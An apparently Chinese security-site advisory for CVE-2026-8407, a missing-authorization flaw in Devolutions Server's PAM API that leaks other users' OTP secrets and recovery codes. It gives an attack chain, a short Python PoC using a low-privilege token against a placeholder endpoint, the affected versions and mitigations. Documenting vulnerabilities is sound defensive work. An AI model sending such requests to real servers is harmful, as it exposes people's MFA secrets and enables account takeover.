CVE-2026-8407 CVSS 4.3 中危

CVE-2026-8407 Devolutions Server权限缺失漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8407

漏洞类型

权限缺失

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Devolutions Server

漏洞概述

Devolutions Server的PAM模块存在权限缺失漏洞。拥有PAM许可证但无额外权限的已认证用户，通过向PAM API端点发送特制请求，即可绕过授权检查获取OTP密钥和恢复代码，导致敏感信息泄露。

技术细节

该漏洞源于Devolutions Server在处理PAM（特权访问管理）模块API请求时的授权逻辑缺陷。在受影响的版本中，服务器仅验证了请求者是否拥有有效的PAM许可证，却未对请求者是否具备访问特定敏感数据（如OTP密钥和恢复代码）的权限进行二次校验。攻击者利用这一漏洞，首先需要获取一个已认证的低权限账户，且该账户被分配了PAM许可证。随后，攻击者无需进行复杂的用户交互或提权操作，直接向受影响的PAM API端点发送特制的HTTP请求。由于缺少授权检查，服务器会错误地响应并返回其他用户的OTP秘密密钥和恢复代码。这些敏感信息的泄露可能导致多因素认证（MFA）被绕过，严重威胁系统的访问控制安全。

攻击链分析

STEP 1

1. 获取凭证

攻击者获取一个Devolutions Server的低权限账户，该账户已通过身份验证并持有PAM许可证。

STEP 2

2. 构造请求

攻击者分析API结构，构造针对PAM模块端点的特制HTTP请求，旨在获取OTP密钥。

STEP 3

3. 发送利用请求

攻击者向服务器发送请求。由于存在权限缺失漏洞，服务器未检查用户是否有权访问该特定资源。

STEP 4

4. 获取敏感数据

服务器响应请求，返回OTP秘密密钥和恢复代码，攻击者成功获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Placeholder)
target_host = "https://devolutions-server.example.com"
api_endpoint = "/api/pam/v1/secrets"

# Attacker's credentials (Low privilege user with PAM license)
auth_token = "LOW_PRIV_USER_TOKEN_HERE"

headers = {
    "Authorization": f"Bearer {auth_token}",
    "Accept": "application/json"
}

# Exploit: Send request to vulnerable endpoint lacking authorization checks
# Expected behavior: Server returns OTP secrets without verifying specific permissions
response = requests.get(f"{target_host}{api_endpoint}", headers=headers, verify=False)

if response.status_code == 200:
    print("[+] Exploit Successful!")
    print("[+] Leaked Data:")
    print(response.json())
else:
    print(f"[-] Failed to exploit. Status code: {response.status_code}")

影响范围

Devolutions Server 2026.1.6.0 through 2026.1.11.0

Devolutions Server 2025.3.16.0 and earlier

防御指南

临时缓解措施

建议立即将Devolutions Server升级至官方发布的最新版本以修复此漏洞。在无法立即升级的情况下，应严格限制内部PAM许可证的使用权限，仅保留给核心管理员，并启用详细的日志审计，以便及时发现针对PAM API端点的未授权访问尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8407
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8407
3 Details https://www.cvedetails.com/cve/CVE-2026-8407/
4 VulDB https://vuldb.com/cve/CVE-2026-8407
5 Link https://devolutions.net/security/advisories/DEVO-2026-0010/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表